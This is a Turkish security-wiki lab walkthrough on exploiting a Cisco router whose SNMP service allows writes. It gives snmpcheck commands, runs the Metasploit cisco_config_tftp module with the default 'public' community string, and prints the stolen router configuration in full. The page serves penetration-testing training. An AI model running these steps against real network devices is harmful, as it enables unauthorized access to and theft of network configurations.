SNMP Write Özelliği Açık Sistemlere Sızma

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

SNMP protokolünün yazma hakları ile yapılandırıldığı bir sisteme sızarak ağ cihazının konfigürasyon ayarlarının elde edilmesi.

Araçlar:

  • snmpcheck
  • Metasploit(cisco_config_tftp)

Lab Senaryosu:

Hedef olarak seçilen sistem bir Cisco router c3725, ağ cihazıdır. Öncelikle ağ cihazına yönelik yapılacak olan testte sistemin SNMP community değeri olarak ön tanımlı bir değer kullanıp kullanmadığı tespit edilecektir. Sonrasında eğer yazma hakkı olan bir hedef bulunduysa, bununla konfigürasyon ayarları değiştirilcektir

Adımlar:

1. Adım: Hedef sistemde çalışan SNMP servisinin yazma hakkına sahip olup olmadığı tespit edilir.

Not: Hedef sistemde SNMP hizmetinin varlığı ön kabul olduğundan nasıl tespit edildiği anlatılmayacaktır. Hedefin yazma hakkının olup olmadığını tespit etmek için snmpcheck aracı “-w” parametresi ile kullanılır.

root@kali:~# snmpcheck -t 2.2.2.1 -w
snmpcheck v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

[*] Try to connect to 2.2.2.1
[*] Connected to 2.2.2.1
[*] Starting enumeration at 2015-04-03 18:24:27
[*] Write access enabled!
[*] Checked 2.2.2.1 in 0.07 seconds

Aracın çıktısında da görüldüğü üzere hedef sistemde SNMP hizmeti yazma hakları ile birlikte yapılandırılmıştır.

2. Adım: Hedef sistemin yapılandırma ayarlarının elde edilmesidir. Bu işlemin gerçekleştirilebilmesi için okuma ve yazma haklarının bulunması gerekmektedir. Metasploit Framework başlatılır ve “cisco_config_tftp” modülü sisteme tanıtılır.

root@kali:~# msfconsole
msf >  use auxiliary/scanner/snmp/cisco_config_tftp

Aracın hedef sistem üzerinde işlem yapabilmesi için ihtiyaç duyduğu parametreler tespit edilir.

msf auxiliary(cisco_config_tftp) > show options
Module options (auxiliary/scanner/snmp/cisco_config_tftp):
  Name   	Current Setting  Required  Description
  ----   	---------------  --------  -----------
  COMMUNITY  public       	yes   	SNMP Community String
  LHOST                   	no    	The IP address of the system running this module
  OUTPUTDIR               	no    	The directory where we should save the configuration files (disabled by default)
  RETRIES	1            	yes   	SNMP Retries
  RHOSTS                  	yes   	The target address range or CIDR identifier
  RPORT  	161          	yes   	The target port
  SOURCE 	4            	yes   	Grab the startup (3) or running (4) configuration (accepted: 3, 4)
  THREADS	1            	yes   	The number of concurrent threads
  TIMEOUT	1            	yes   	SNMP Timeout
  VERSION	1            	yes   	SNMP Version <1/2c>

3. Adım: Gerekli alanlar girilir ve sistemin zafiyeti istismar edilir.

msf auxiliary(cisco_config_tftp) > set RHOSTS 2.2.2.1
RHOSTS => 2.2.2.1
msf auxiliary(cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 2.2.2.1...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 2.2.2.1 - 2.2.2.1.txt 871 bytes
[+] 2.2.2.1:161 SNMP Community (RW): public
[*] Collecting :public
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed

Community değeri bir önceki uygulamalarda tespit edilmiş ve”Public” tir. Aracın ön tanımlı değeri olarak girildiği için düzenlenmeye ihtiyaç duyulmamıştır. Görüldüğü üzere sistemin yapılandırma ayarları elde edilmiştir.

4. Adım: Elde edilen yapılandırma ayarlarının görüntülenmesi;

Metasploit bir aracın çıktısını “.msf4/loot/” dizini altına atmaktadır. Dizin başında bulunan “.” dizinin gizli olduğunu göstermektedir.

Dosyanın okunması;

kali:~# cat .msf4/loot/20150403173253_default_2.2.2.1_cisco.ios.config_391860.txt
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec 
no service password-encryption
! 
hostname R1
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
!
resource policy
!
memory-size iomem 5
ip subnet-zero
no ip icmp rate-limit unreachable
ip cef
ip tcp synwait-time 5
!
!
no ip domain lookup
!
!
interface FastEthernet0/0
ip address 2.2.2.1 255.255.255.0
duplex auto
speed auto
!
interface FastEthernet0/1
no ip address
shutdown
duplex auto
speed auto
!
ip classless
!
no ip http server
no ip http secure-server
!
snmp-server community public RW
snmp-server contact HASH(0x2e69c78)
no cdp log mismatch duplex
!
!
control-plane
!
!
line con 0
exec-timeout 0 0
privilege level 15
logging synchronous
line aux 0
exec-timeout 0 0
privilege level 15
logging synchronous
line vty 0 4
login
!

Ağ cihazının yapılandırılması bu zafiyet istismarını göstermek üzere gerçekleştirildiği için, cihazda çok önemli bir bilgi bulunmamaktadır. Fakat gerçek sistemlerde ağ yapısına ait önemli bilgilerin varlığı tespit edilebilir.